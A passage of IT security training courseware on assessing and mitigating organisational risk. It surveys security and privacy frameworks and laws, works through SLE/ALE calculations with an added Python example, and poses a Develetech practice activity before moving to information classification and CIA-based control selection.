ITAF: The Information Technology Assurance Framework (ITAF™), also published by ISACA, focuses primarily on auditing. ITAF provides guidance for the roles and responsibilities of auditors, as well as guidance for the overall audit process and how to incorporate risk assessment in that process. The most recent version is the fourth edition, released in 2020.

ISO/IEC 27000 series: Developed by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC), the ISO/IEC 27000 series is a large family of IT security standards. For example, ISO/IEC 27001 provides comprehensive guidance on information assurance principles and processes; ISO/IEC 27000 provides an overview of IT security and vocabulary; ISO/IEC 27033 focuses on network security; ISO/IEC 27040 focuses on data storage security; and many more.

Standard of Good Practice for Information Security: This is a standard published by the Information Security Forum (ISF) that focuses on helping businesses understand and address evolving security issues in the subject areas of compliance, threats, and risk management. The latest version is from 2020.

RFC 2196: Titled Site Security Handbook, this Request for Comments (RFC) publication provides guidance on securing sites that have Internet-connected systems. The publication includes subject matter like best practices for policy writing, network and systems security, and incident response. It was published in 1997.

CIS Controls: The Center for Internet Security (CIS) lists 18 general control categories, also called the Critical Security Controls. Example categories include data protection, malware defenses, and access control management. CIS provides specific security procedures and action items for each control category in a checklist format. The most recent update, version 8, was released in 2021.

ISA/IEC-62443: Also referred to as ANSI/ISA-62443, and formerly known as ANSI/ISA-99, this is a series of standards that provides guidance and best practices for implementing security in industrial control systems (ICSs). It was initially developed by the International Society of Automation (ISA), published by the American National Standards Institute (ANSI), and then adopted by the International Electrotechnical Commission (IEC).

NERC 1300: This is a standard first published in 2004 by the North American Electric Reliability Corporation (NERC) for the security of bulk electric systems (BESs), which the NERC defines as any "transmission element" that operates at 100 kilovolts (kV) or higher and "real power" and "reactive power" resources connected at 100 kV or higher. Essentially, this standard applies to hardware and software components that may support or interface with certain electrical systems.

SSAE 18: The Statement on Standards for Attestation Engagements no. 18 is an auditing standard published in 2018 by the American Institute of Certified Public Accountants (AICPA). It is primarily focused on assuring that financial reporting is accurate and complete, and can be applied to any cybersecurity system that is involved in financial reporting.

OWASP

Although not technically a framework or standard, the Open Web Application Security Project (OWASP) is a community effort that provides free access to a number of secure programming resources and best practices. The most prominent of OWASP's resources is their Top 10 Project, which lists the most significant risks to web apps in a particular calendar year. The latest Top 10 was published in 2017.

Cloud Security Alliance (CSA)

The Cloud Security Alliance (CSA) is another organization that exists to promote best practices in cybersecurity, particularly when it comes to cloud computing. The CSA is a coalition of several member organizations, including Google™, Microsoft®, Huawei®, Oracle®, and more. The CSA has several working groups that research cloud security topics for both providers and consumers, including education and training, tools, processes, and defensive strategies.

Security Laws and Regulations

Standards, frameworks, and best practices are optional for the organization to follow, though they are a great help to the risk assessment process. However, there are various laws and regulations an organization is required to follow that also have an impact on risk assessment.

The following table lists some of the major laws and industry regulations that you may need to comply with.

Law or Regulation / Description

SOX: The Sarbanes–Oxley Act (SOX) of 2002 is a U.S. law that dictates requirements for the storage and retention of documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods. It is relevant for any publicly traded company with a market value of at least $75 million.

FISMA: The Federal Information Security Management Act (FISMA) of 2002 was passed in the United States to address the evolutionary nature of information systems security in the federal government. Some of the act's key provisions require federal organizations to:
• Define the boundaries of the systems to be protected and then identify the types of information found within those systems.
• Document system information and perform a risk assessment to identify areas requiring additional protection.
• Protect systems using an identified set of controls and certify systems before use. An approval for operation is issued upon certification.
• Continuously monitor systems for proper operation.
FISMA was amended in 2014 to bolster the federal government's ability to respond to attacks on its departments and agencies.

CMMC: The Cybersecurity Maturity Model Certification is a framework announced in 2019 for training, assessing, and certifying organizations that contract with the U.S. government. Such organizations must be certified by a third party as having met the cybersecurity standards set forth by the Department of Defense (DoD) and an accreditation board of security professionals. Although the CMMC program is currently a DoD-specific requirement, it may eventually be mandatory for all government contractors—civilian or military—to achieve this certification.

Computer Misuse Act: This UK act, introduced in 1990, makes provisions for securing computer material against unauthorized access or modification. The act introduced three criminal offenses, the aim being to deter criminals from using a computer to assist in the commission of a criminal offense. The key offenses are:
• Unauthorized access to computer material.
• Unauthorized access with intent to commit or facilitate commission of further offenses.
• Unauthorized modification of computer material.


Privacy Standards and Frameworks

Privacy and security are intertwined, as the former depends on the latter. Still, privacy concerns are sometimes broken out into their own category for the sake of focusing on issues that affect the secrecy of personal data. The following table describes some standards and frameworks that focus primarily on data privacy.

Standard or Framework / Description

NIST Privacy Framework: NIST publishes the Privacy Framework to help organizations identify and manage risks to data privacy. It encourages organizations to build customer trust, fulfill their compliance obligations, and communicate their practices to outside parties.

The Privacy Framework follows the same general structure as the Cybersecurity Framework, incorporating the "Core," "Profile," and "Tiers" sections. The first and latest version was published in 2020.

ISO/IEC 27000 series: Although much of the ISO/IEC 27000 series is relevant to protecting data privacy, there are several publications that focus on data privacy specifically, including ISO/IEC 27018, ISO/IEC TS 27110, ISO/IEC 27701, and ISO 27799.

ISO/IEC 29100: The 29100 standard, Information technology — Security techniques — Privacy framework, outlines common terminology for privacy, the roles and responsibilities of those involved in protecting privacy, controls for safeguarding privacy, and references to known best practices for privacy. The most recent version was published in 2011, though it was last reviewed and confirmed in 2017.

GAPP: Generally Accepted Privacy Principles (GAPP) was a joint effort by the AICPA and the Canadian Institute of Chartered Accountants (CICA)—now the Chartered Professional Accountants of Canada (CPA of Canada)—to provide guidance to chartered accountants (CA) and certified public accountants (CPA) in maintaining the security of personally identifiable information (PII).

GAPP defines ten principles, including: management; notice; choice and consent; collection; use, retention, and disposal; access; disclosure to third parties; security for privacy; quality; and monitoring and enforcement. GAPP was last updated in 2009.

Federal Trade Commission

The U.S. Federal Trade Commission (FTC), aside from enforcing certain laws, also provides guidance to both public and private organizations regarding data privacy for consumers. For example, the publication Start with Security: A Guide for Business outlines general best practices for upholding the privacy of user data. The FTC also promotes best practices in specific contexts, like mobile health apps, Internet of Things (IoT) devices, and more.

Privacy Laws and Regulations

The following table describes major laws and regulations that have a focus on data privacy.

Law or Regulation / Description

HIPAA: The Health Insurance Portability and Accountability Act (HIPAA) was enacted in 1996 to establish several rules and regulations regarding healthcare in the United States. With the rise of electronic medical records, HIPAA standards have been implemented to protect the privacy of patient medical information through restricted access to medical records and regulations for sharing medical records.

GLBA: The Gramm–Leach–Bliley Act (GLBA) of 1999 was primarily passed as a deregulation of banks in the United States, but also instituted requirements that help protect the privacy of an individual's financial information that is held by financial institutions and others, such as tax preparation companies. The privacy standards and rules created as part of GLBA safeguard private information and set penalties in the event of a violation. GLBA also requires a coherent risk management and information security process.

COPPA: The Children's Online Privacy Protection Act (COPPA) is a U.S. federal law passed in 1998 that stipulates what actions a website operator must take to protect the personal data of children under the age of 13. This includes displaying a privacy policy, obtaining consent from the child's parent or guardian, and securing personal data in both storage and use. COPPA also applies to children outside the U.S. if the organization that handles their data is based in the U.S.

CAN-SPAM: The Controlling the Assault of Non-Solicited Pornography and Marketing (CAN-SPAM) Act is a U.S. federal law passed in 2003 that sets rules for entities sending commercial email. There are several rules that prohibit the spread of false or misleading information in email headers, deceptive subject lines, and messages that don't properly self-identify as advertisements. CAN-SPAM requires commercial entities to make it clear and easy for recipients to opt out of all email messages, protecting private email accounts from unwanted messages.

PIPEDA: Canada's Personal Information Protection and Electronic Documents Act (PIPEDA), enacted in 2001, establishes various principles that organizations must follow in the collection, use, and disclosure of personal information. PIPEDA initially applied to private organizations that are federally regulated and was updated in 2004 to apply to all other organizations, bringing Canada into compliance with European Union (EU) privacy regulations.

Data Protection Act: The UK's Data Protection Act makes new provisions for the regulation of the processing of information relating to individuals, including the obtaining, holding, use, or disclosure of such information. The act comprises eight core principles that focus on the accuracy and confidentiality of personal data kept by organizations, as well as the organization's necessary levels of security to assure that personal data is not compromised.
GDPR: The General Data Protection Regulation (GDPR), which went into full effect in the European Union in 2018, regulates the export of personal data outside the EU. It is intended to protect individual privacy by holding data collection and data processing entities accountable for the information of EU citizens. The regulation applies to all entities that collect or process the personal data of EU citizens, even if the entity is not based in the EU.

The GDPR ultimately upholds the privacy rights of individuals (e.g., the right to correct inaccurate personal data), enforces restrictions and security obligations for organizations (e.g., report data breaches within 72 hours), and issues penalties for non-compliance (e.g., fines up to €20 million or 4 percent of global turnover).

PCI DSS: The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary standard that specifies how organizations should handle information security for major card brands that include Visa, MasterCard, American Express, Discover, and JCB (formerly Japan Credit Bureau), all of which provide a mandate for the standard.

The standard is intended to increase controls on cardholder data to reduce fraudulent use of accounts. Although not technically a law or regulation, organizations or merchants that accept, transmit, or store cardholder data (regardless of size or number of transactions) must comply with this standard or face penalties.

Personal Information Protection Law of the People's Republic of China (PIPL)

The government of China passed a privacy law in 2021 that outlines rules for individuals and organizations handling the personal information of Chinese citizens.

New and Changing Factors That Impact Risk

Most industries—particularly those in computing technologies—are constantly evolving at a rapid rate. Likewise, the risks to those industries change just as quickly. As you assess risk in your organization, you should consider various factors that may have changed or will soon change that could have an impact on your efforts.
• New and changing business strategies. As the world changes, it brings about new forms of doing business. Today's interconnected world offers rich opportunities for companies to partner with other organizations, outsource their operations, rely on cloud providers for support, and merge and demerge assets with other business entities.
• De-perimeterization. De-perimeterization is the process of shifting, reducing, or removing some of the organization's boundaries to facilitate interactions with the world outside its domain. Examples of de-perimeterization include remote work, reliance on cloud services and other outsourcing opportunities, and the bring your own device (BYOD) phenomenon.
• User behaviors. Users often present the largest risk to an organization. Users have access to data, are usually not as technically savvy as systems administrators or security personnel, and are frequently targeted by attackers through the use of social engineering methods. In a world of remote work and online collaboration, users will change how they interact with each other and the organization's resources.
• New products and technologies. As new products are used by an organization, new vulnerabilities and threats are introduced, which increases risk. Similar to new products, new technologies must be evaluated for vulnerabilities and threats, but one technology might have markedly different risks from another. For example, mobile computing platforms like tablets and smartphones suffer from similar risks to traditional desktops, such as buffer overflows, yet have new risks, such as the ease of loss due to their small size and mobility.
• New threats. Attackers are constantly inventing new attacks, and how organizations conduct business is always changing. This cycle of recurring change introduces new threats into an organization, and thus new risks. For example, if a new weakness is found in an encryption protocol such as Secure Sockets Layer/Transport Layer Security (SSL/TLS), the organization will need to determine how to patch its systems or mitigate the threat in another way.

Internal and External Influences

Many different types of events influence risk. Some of these influences are internal and some are external to the organization. You should assess how each influence aids or detracts from the risk management process.

Influence Type / Risk Assessment Relevance

Internal compliance
Internally, all the employees of an organization are stakeholders concerned with the safety and security of the organization. When senior management signs off on a risk management plan, everyone should be expected to assist with its implementation; that is, be in compliance with the plan. This is not always easy to do, as a great deal of training may be required and numerous policies and procedures may be put in place to ensure full compliance.
When done properly, internal compliance assessments can identify controls that are not operating as intended and are not reducing the risk to acceptable levels. Since internal users bring a high degree of risk to an organization's network and systems, including them in your assessment of risk will produce more accurate results. After all, they are the ones who access and use those systems on a daily basis and can help identify areas where additional risk treatment is necessary.

External compliance
All businesses must comply with external regulatory entities. It is important that your organization follows all applicable laws, regulations, and standards. The federal government will, for example, enforce HIPAA in U.S. organizations that work in the healthcare industry. Even standards that are not necessarily legally binding, like those enforced by the ISO, are ubiquitous in the industry.
Although the goal of compliance regulations is to provide a minimum acceptable baseline for managing risks in a particular industry or organization, most regulations do not place requirements on the effectiveness of a control, but instead on whether or not the control is present. Without measuring a control and applying a baseline to the regulation, it is impossible to determine if the controls are effectively deployed within the organization. This is why simply being compliant will not necessarily produce an optimum risk assessment. Your organization may be compliant but still may not be as secure as it should be under the intent of the regulation or standard.

Internal client requirements
Internal clients are often stakeholders in risk management planning and implementation because they are direct users of corporate resources. Internal clients should be involved in risk assessment, as they are at the forefront of recognizing risks that impact the organization. If they are not involved, it will be impossible to secure their environments, which in turn will lead to client dissatisfaction and reduced customer business.

External client requirements
The involvement of external clients depends on their needs. External clients have a vested interest in the ongoing activities of the organization with which they conduct business. In that regard, they are another front-line resource for identifying the threats and vulnerabilities of the business. At the same time, external clients who are part of risk management planning for their trading partners might demand that the risk management plan include business continuity protocols so that their source of supply can continue in the event of a loss. They might also insist on measures that protect the confidentiality they share with their trading partners. Because of this vested interest, external clients can provide insight on the ways to assess risk in an organization that has business relationships.

Audit findings
Audit findings influence risk by providing evidence that controls are adequate in reducing or eliminating risk. Where an auditor's results are below acceptable thresholds, the organization should assess the risk and determine if mitigation, transfer, or acceptance is the correct approach. In some cases, it is impossible to reduce risk further; for example, where the use of legacy systems is required as part of an established business function. In cases such as this, it may be necessary to change the business process or outsource the function entirely to avoid the risk. Likewise, it may be necessary to rethink your technology infrastructure.

Top-level management
Top-level management is one of the key stakeholders in the risk assessment process. Without proper risk assessment, they will be unable to make informed decisions about how to operate the business. When presenting both internal and external risk to executive management, quantitative analysis and accurate metrics are two of the key components that you must communicate effectively. When this is done, it will be easier for you to get buy-in from executive management for risk mitigation plans and the appropriate funding of security initiatives.

Competitors
Competitors can drive changes in business. In order to stay competitive, the organization may develop new products, incorporate new technology, and expand customer markets. All of these activities bring their own risk to the organization.
System-Specific Risk Analysis

To understand the risks to an organization, a security professional must be able to analyze the organization's systems to understand how those systems are used and how the confidentiality, integrity, and availability (CIA) of the systems are threatened. A number of different frameworks and processes have been established to assist this analysis. Although how you go about your analysis will differ with respect to what you're analyzing, the following are some common questions to ask when trying to quantify a risk:
• How can an attack be performed?
• Can the attack be performed in the current network, and are the assets accessible?
• Can the requirement for authentication reduce the possibility of attack?
• What is the potential impact to the confidentiality, integrity, and availability of the data?
• How exploitable is the flaw? Is it theoretical or does a working exploit exist?
• Are there workarounds or patches available?
• How confident is the report of the vulnerability? Is it an established and tested approach?
• What could be the potential damage to the organization?
• How many targets exist within the organization?
• What are the confidentiality, integrity, and availability requirements for the assets in question?
• How likely is the risk to manifest itself?
• What mitigating protections are already in place? How long will it take to put additional controls in place? Are those additional protections cost effective?
• How can you translate technical risks into terms of how they could occur and what the effect would be on the business (for example, loss of revenue, reputation, legal repercussions)?
Instructor Note: Consider asking students which questions are most important to them.

Examples of System-Specific Risk Analysis

If, for example, your organization is a cloud provider with multiple sites worldwide, your analysis should focus on the chances of an attack succeeding, what an attack can compromise in terms of the data you host and its availability to your customers, and how exactly an attack can be performed. In this scenario, patches and software fixes may be irrelevant to stopping an attack, so you won't necessarily focus on that in your analysis. Likewise, you may be less concerned with the cost effectiveness of any controls, since you have a considerable security budget.
If your organization is small and has primarily local customers, you'll want to approach your analysis differently. Cost effectiveness becomes a significant factor in security controls, as your budget will likely be limited. Also, you may want to focus more on the damage an attack will do to your own systems, since you're unlikely to have the amount of redundancy that a large organization will.
The point is, before you even begin your risk analysis, you should tailor it to your own situation to maximize its efficacy and dispense with irrelevant factors.

Risk Determinations

A significant part of risk assessment is determining just how certain risks can specifically impact the organization. Two influential factors in risk determination are the likelihood of threats and the magnitude of impact.
You can determine the likelihood of a threat bringing risk to your organization by using the following methods:
• Discovering the threat's motivation, if it has any. What does an attacker stand to gain from conducting an attack? Note that some risks, like accidents and non-human factors (e.g., fires and floods) have no motivation.
• Discovering the source of the threat. Who is the threat? Is it an individual or a group? Where are they from, and what is their experience?
• Determining the threat's annual rate of occurrence (ARO). How often does the threat successfully affect the organization?
• Conducting a trend analysis to identify emerging threats and threat vectors. How effective are these threat vectors, and how have they been exploited before?
A quantitative assessment of risk attempts to assign a monetary value to the elements of risk, as in the following formula:
AV (Asset Value) × EF (Exposure Factor) = SLE (Single Loss Expectancy)
The single loss expectancy (SLE) value represents the financial loss that is expected from a specific adverse event. The exposure factor is the expected percentage of the total asset value that will be lost if the risk is realized. So, if an asset is worth $10,000, but an adverse event only leads to half of that being lost, then SLE is $10,000 × .50 = $5,000.
If you know how many times this loss is likely to occur in a year, you can calculate the cost on an annual basis:
SLE (Single Loss Expectancy) × ARO (Annual Rate of Occurrence) = ALE (Annual Loss Expectancy)
The annual loss expectancy (ALE) value is calculated by multiplying an SLE by its ARO to determine the financial magnitude of a risk on an annual basis. So, if the example from before is likely to occur three times in one year, the ALE would be $5,000 × 3 = $15,000.
Note: The ALE may be a moving target, as threats cannot necessarily be quantified as occurring annually, but rather on an individual basis. In addition, threats change over time.
Instructor Note: Consider pointing out that a lot of research and analysis goes into each element of these formulas, so calculating SLE and ALE may not be as easy as it looks. Consider placing these formulas in a real-world context for students. For example, what is the asset value of their car, and how likely is it to receive damage? They can use this information to determine their loss expectancy for the risk of a car crash.
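The SLE and ALE formulas above carried through in Python, as an added example that is not part of the CFR-410 courseware. It reproduces the $10,000 example from the text and the Develetech warehouse flood from Activity 1-2 (question 3), converts a "once every 10 years" estimate into an ARO, ranks scenarios by ALE for prioritization, and extends the page's cost-effectiveness question with a simple control cost/benefit check. The function names, the RiskScenario class, and the flood-barrier cost are assumptions made for this illustration.

```python
"""Quantitative risk determination: SLE = AV x EF, ALE = SLE x ARO.

Added worked example; not code from the CFR-410 courseware. The asset values
and exposure factors come from the text's examples; the control cost is
constructed for illustration.
"""
from dataclasses import dataclass
from typing import List


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV x EF. The exposure factor is the fraction (0.0 to 1.0) of the
    asset's value expected to be lost in one occurrence of the adverse event."""
    if asset_value < 0:
        raise ValueError("asset value cannot be negative")
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be a fraction between 0 and 1")
    return round(asset_value * exposure_factor, 2)


def aro_from_interval(years_between_events: float) -> float:
    """Turn an estimate such as 'once every 10 years' into an annual rate of
    occurrence (0.1). An event expected several times a year gives an ARO > 1."""
    if years_between_events <= 0:
        raise ValueError("interval between events must be positive")
    return 1.0 / years_between_events


def annual_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO, the expected financial magnitude of the risk per year."""
    if aro < 0:
        raise ValueError("annual rate of occurrence cannot be negative")
    return round(sle * aro, 2)


@dataclass(frozen=True)
class RiskScenario:
    """One threat against one asset, holding the inputs the text asks you to gather."""
    name: str
    asset_value: float
    exposure_factor: float
    aro: float

    @property
    def sle(self) -> float:
        return single_loss_expectancy(self.asset_value, self.exposure_factor)

    @property
    def ale(self) -> float:
        return annual_loss_expectancy(self.sle, self.aro)


def rank_by_ale(scenarios: List[RiskScenario]) -> List[str]:
    """Scenario names ordered from largest to smallest ALE: a quantitative
    basis for deciding which risks to treat first."""
    return [s.name for s in sorted(scenarios, key=lambda s: s.ale, reverse=True)]


def control_net_benefit(ale_before: float, ale_after: float,
                        annual_control_cost: float) -> float:
    """Hypothetical cost/benefit check (an extension, not a formula from the
    text): the ALE reduction a control buys, minus what the control costs per
    year. A positive result means the control is cost effective on paper."""
    return round((ale_before - ale_after) - annual_control_cost, 2)


def demo() -> dict:
    # Example from the text: $10,000 asset, half lost per event, three events a year.
    text_example = RiskScenario("text example", 10_000, 0.50, 3)
    # Activity 1-2, question 3: $10,000,000 warehouse, 20% lost, one flood per 10 years.
    flood = RiskScenario("warehouse flood", 10_000_000, 0.20, aro_from_interval(10))
    # Constructed: a flood barrier assumed to cost $60,000/year that cuts the
    # exposure factor to 5%, so the ALE falls from $200,000 to $50,000.
    mitigated = RiskScenario("warehouse flood (with barrier)", 10_000_000, 0.05, flood.aro)
    return {
        "text_sle": text_example.sle,
        "text_ale": text_example.ale,
        "flood_sle": flood.sle,
        "flood_ale": flood.ale,
        "priority": rank_by_ale([text_example, flood]),
        "barrier_net_benefit": control_net_benefit(flood.ale, mitigated.ale, 60_000),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The validation on the inputs matters in practice: an exposure factor entered as "20" instead of "0.20" silently inflates the SLE twentyfold, which is exactly the kind of error that undermines the credibility of the metrics you present to executive management.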

Documentation of Assessment Results

During or after a risk assessment, you may be called upon to document your findings. To be effective, these reports must answer the following questions:
• Who asked you to perform the assessment?
Use this question to create a record of who asked you to conduct the assessment. This will help you establish a clear authority in writing, especially if personnel changes or if the business is restructured during the assessment.
• What were you asked to do?
Use this question to make clear exactly what you were told to assess. Going beyond the scope of the assessment or failing to assess every element expected of you could impact your overall conclusions.
• What did you assess?
Specifically mention any technological, administrative, or operational processes you assessed. It's important this record is comprehensive and avoids vague references to assets, people, or other targets of the assessment.
• What did you do?
This is where you outline your assessment methodology so the audience of your report can verify the assessment's results as accurate and useful.
• What did you find?
In this part of the report, you'll include the immediate results of your assessment based on the steps you took earlier. Make sure to write clearly and consider the target audience's aptitude in technology and business operations.
• What does it all mean?
This last question prompts you to piece all your findings together to offer a conclusion. What do you believe happened, how did it happen, and who do you think is responsible? You cannot necessarily rely on the audience of this report to draw their own conclusions; they'll likely be looking for you to do that so they can verify the validity of those conclusions. Although these conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case will be more inclined to agree.
Guidelines for Assessing Risk

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the CHOICE Course screen.
Follow these guidelines when you assess risk in the organization.

Assess Risk in the Organization

When assessing risk:
• Assess industry-accepted security and privacy frameworks and standards for how they may benefit your organization.
• Identify security and privacy laws and regulations your organization is subject to.
• Evaluate new and changing business factors that could have an impact on risk.
• Consider how practices like remote work and BYOD may impact your organization's network perimeter.
• Consider how internal and external compliance, internal and external client requirements, and audit findings influence risk.
• Determine how risks can affect the CIA of specific systems in your organizational environment.
• Determine what a threat is, where it comes from, and what risk it poses to the organization.
• Calculate the SLE and ARO of a threat, and then use the product of these two values to obtain your ALE.
• Document your assessment results clearly and comprehensively.


ACTIVITY 1-2
Assessing Risk

Scenario

Now that you're aware of the importance of risk management, you'll want to begin by assessing risk at Develetech to get a better picture of just how the business currently fares during its expansion. You'll also gain an understanding of how the evolving nature of technology will affect Develetech in the future, and what sort of unique challenges this poses to your risk management strategy. Assessing risk on an organizational level will enable you to later address and mitigate those risks.

1. Develetech is a U.S.-based company, but it does business all around the world.
What laws and regulations might Develetech be subject to?
A: Answers will vary, but among those discussed in this topic, Develetech is likely subject to U.S. laws like SOX and CAN-SPAM. Develetech probably doesn't handle health records, so HIPAA is unlikely to be relevant. Develetech is also likely subject to GDPR since it does business all over the world, including the European Union.

2. You've identified compliance to be one of the biggest concerns for the expansion.
How will both internal and external compliance factors influence your risk assessment?
A: Answers may vary. Your internal staff needs to comply with your risk management plan once it has been put in place. This usually means training certain staff is required; otherwise, they might not be properly equipped to meet compliance requirements. Because internal users access your systems constantly, they can bring a great deal of risk. Externally, your organization must comply with all applicable laws and regulations. Even failure to comply with non-legally binding, industry-accepted standards may place your organization's finances or reputation in jeopardy. However, external compliance will not guarantee security. You may find that your risk is still too high even though you adhere to security requirements.

3. Develetech's main warehouse is worth $10,000,000 when including its physical assets and the day-to-day operations it provides. There is a risk of the warehouse being partially destroyed in a flood. About 20% of the warehouse and its operations will be lost in such an event. Based on where Develetech is located, you estimate that a catastrophic flood is likely to occur once every 10 years.
What is the annual loss expectancy (ALE) for a flood damaging the warehouse?
○  $800,000
○  $200,000
○  $5,000,000
○  $20,000,000
Instructor Note: The correct answer is derived from multiplying $10,000,000 (asset value) by .20 (exposure factor) to get the SLE, then multiplying the SLE by .10 (ARO).

TOPIC C
Mitigate Risk
After assessing how particular elements in your operations can bring risk to the organization, you're ready to actively respond to those risks. Mitigation is all about balancing your response capabilities with your tolerance for risk, and there are several different approaches that may work best for you. As an information assurance professional, you'll choose the most appropriate mitigation strategy to keep your organization as safe from harm as possible.

Classes of Information

When developing a risk mitigation strategy, you need to classify the information that needs to be protected. The requirements to protect information will differ between jurisdictions, so you must examine the applicable regulatory requirements to ensure the classification takes this into account. Some information is more or less critical than other types. In addition to meeting compliance requirements, classifying information can also help you determine what controls to apply.
In general, there are four classes of information that organizations use:
• Public information, which presents no risk to an organization if it's disclosed, but does present a risk if it's modified or not available.
• Private information, which presents some risk to an organization if competitors were to possess it, if it were modified, or if it were not available.
• Restricted information, which might be limited to a very small subset of the organization primarily at the executive level (e.g., corporate accounting data), where unauthorized access to it might cause a serious disruption to the business.
• Confidential information, which would have significant impact to the business and its clients if it were disclosed. Client account information like user names and passwords, personally identifiable information (PII), protected health information (PHI), payment card information/cardholder data (CHD), and personal data covered by the UK's Data Protection Act would be in this category.
Instructor Note: There are several different classification schemes, and students may be more familiar with others. Consider asking students about their experience with information classification, and incorporate their answers into the rest of the subject matter.

Figure 1-4: Classes of information.

U.S. Military Classification System

Military classifications are defined and implemented by the U.S. federal government to categorize sensitive information that requires protection. The assigned classification level is determined by the level and magnitude of damage to the country's national security if the information falls into the wrong hands or becomes public. The classification levels can vary between countries. The classification level controls who can access the information and the restrictions for how the information is handled. From most restrictive to least, the U.S. military levels of classified information are:
• Top Secret
• Secret
• Confidential
• For Official Use Only
Executive Order 13526 outlines these classification levels and can be viewed at https://www.archives.gov/isoo/policy-documents/cnsi-eo.html.

UK Government Classification System

In the UK, a similar classification system is implemented. The UK government policy describes how it classifies information to ensure it is appropriately protected, supports public sector business and the effective use of information, and meets the requirements of relevant legislation and international/bilateral agreements and obligations. As with the U.S. system, the classification is determined by the likely impact resulting from compromise, loss, or misuse of the information and the need to defend against a broad profile of threats. For each classification, there is a set of baseline personnel, physical, and technical controls considered to provide an appropriate level of protection against a defined "typical" threat level. From most restrictive to least, the UK government levels of classified information are:
• Top Secret
• Secret
• Official
The published UK policy on classification levels can be viewed at https://www.gov.uk/government/publications/government-security-classifications.

Classification of Information Types into CIA Levels

Information is not categorized by access levels only; it can also be thought of in terms of how a compromise of that information can negatively impact the three core security attributes of the confidentiality, integrity, and availability (CIA) triad. When surveying information within an organization, it is important not to solely judge the type of information, but how that information is used throughout the business as well. Public information, if disrupted, wouldn't necessarily cause problems from a confidentiality perspective. However, availability may drop significantly, compromising a very crucial part of any organization's security focus. Ultimately, you should investigate how each data category in your organization fits into the larger three goals of security so that you may be better prepared to respond to risk.
Note: The CIA triad is sometimes referred to as the AIC triad, CAI triad, etc., to differentiate it from the U.S. Central Intelligence Agency.
Instructor Note: Consider mentioning that availability is often not just the domain of security, but also includes operational departments.

Figure 1-5: The CIA triad.

Example

Imagine a large outsourcing company that runs payroll applications for its clients. This outsourcing provider would have massive quantities of confidential information, including names, addresses, bank account and routing numbers, Social Security numbers, and tax return data. It may also have self-administered health plan data that would be classified under HIPAA as PHI, bringing a regulatory and compliance element to its operations as well.
Now contrast that organization against a small company, where such data would be relative to the size of the company and there would be little to no required uptime to support it. By comparing these two companies, you can see how organizational perspective and scope can increase or decrease the risks associated with different types of data. While penalties and liability associated with a confidentiality and integrity breach of the payroll records would affect either organization, the outsourcing provider has significantly more at stake. Not only would brand damage result from the outsourcing provider's exposure or loss, but they would also lose immediate income through the refund component of their service-level agreement (SLA).
The smaller organization may be penalized for exposing data or failing to protect it from tampering; however, compared to the larger payroll provider, the smaller organization has less at stake.
Security Control Categories

Many of your risk mitigation efforts will be put in motion by the various security controls you implement. These controls will come in many different forms and have many different functions. The three main categories of security controls are as follows:
Instructor Note: The following information should serve as a refresher for most students. Point out that controls can be categorized in a variety of ways and that this is just one common example.
• Technical
Technical controls, also called logical controls, are hardware or software installations that are implemented to monitor and prevent threats and attacks to computer systems and services. For example, installing and configuring a network firewall is a type of technical control.
• Physical
Physical controls are security measures that restrict, detect, and monitor access to specific physical areas or assets. For example, placing locks on a door is a type of physical control.
• Administrative
Administrative controls, also called management controls or operational controls, monitor an organization's adherence to security policies and procedures. For example, a regularly scheduled security scan and audit to check for compliance with security policies is a type of administrative control.
A large part of evaluating and mitigating risk in the organization is to review the effectiveness of existing controls from all these categories, as well as any controls the organization may consider adding to its risk management program.

Control Selection Based on CIA Requirements

Once a specific risk has been quantified, it is possible to determine the best approach to mitigating the specific risk through various controls. Risks can be mitigated based on the specific CIA attribute targeted, and the technology used to reduce the risk does not always cover all three attributes. Consider the following table, in which examples of technical controls are reviewed and selected in terms of how they do or do not uphold the CIA principles.
Instructor Note: Slides "Technical Controls (Template)" and "Technical Controls (Example Answer)". Use the template slide to prompt students to provide their own answers. Use the next slide to provide an example of how they could fill in the table.

Technical Control: User permissions for network share
Upholds Confidentiality? Yes, by keeping unauthorized users from accessing shared data
Upholds Integrity? No
Upholds Availability? No

Technical Control: Load balancers for web servers
Upholds Confidentiality? No
Upholds Integrity? No
Upholds Availability? Yes, by routing traffic to hosts that are available and have capacity

Technical Control: Message authentication codes (MACs) used in digital signatures
Upholds Confidentiality? No
Upholds Integrity? Yes, by comparing the expected message digest with the actual message digest upon output
Upholds Availability? No

As you can see, no single technology in this list of examples addresses all three attributes. An organization has well-rounded security when it specifically upholds all three components of the CIA triad. Keep in mind, however, that CIA attributes are not the only criteria by which you can select the optimal controls for your organization. Ultimately, your organization must define which parameters it needs to uphold to mitigate risk, and this will drive your process for selecting the right controls.
Application of Controls That Address CIA Requirements

There are several approaches you can use to address risks to confidentiality; for example, encryption and access control. In both cases, the goal is to limit the readability of data to only authorized parties. What you implement will depend on your needs as an organization. Access control may be enough to keep unwanted users from accessing somewhat sensitive data, but in scenarios where data is much more sensitive, you may want to aim for encryption to achieve the strongest confidentiality assurances.
Controls to address risks to integrity primarily rely upon data validation and auditing. This includes the use of read-only data stores and strong authentication controls in applications using multiple factors. Auditing controls function by monitoring the integrity of the data as it exists in the system and as data is passed through input and output routines. Auditing is a useful policy for essentially all organizations, though it isn't as active in maintaining integrity as forms of validation like hashing.
Most commonly, organizations implement redundancy measures to mitigate hardware failures, which have a serious impact on availability. By using failover techniques such as active–passive and active–active, it is possible to seamlessly fail over to backup hardware. However, not all threats are caused by hardware failure. In some situations, the consumption of resources is responsible for the system becoming unavailable. An example of this would be a DoS attack that leverages a flaw in the software to consume resources beyond the intended limits of the system or architecture. Once started, a DoS attack can be very difficult to recover from. There are various flood control mechanisms that may prevent successful DoS attacks, such as load balancers.
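The integrity control described in the MAC row of the table above and in the validation-and-auditing paragraph, shown as working code. This is an added example, not code from the CFR-410 courseware: a keyed digest is computed over each record when it is written and compared with a freshly computed digest when the record is read back, and an auditing routine scans a data store for records whose digests no longer match. HMAC-SHA256 is assumed as the MAC; the key, the payroll-style record values, and the simulated modification are all constructed for the example.

```python
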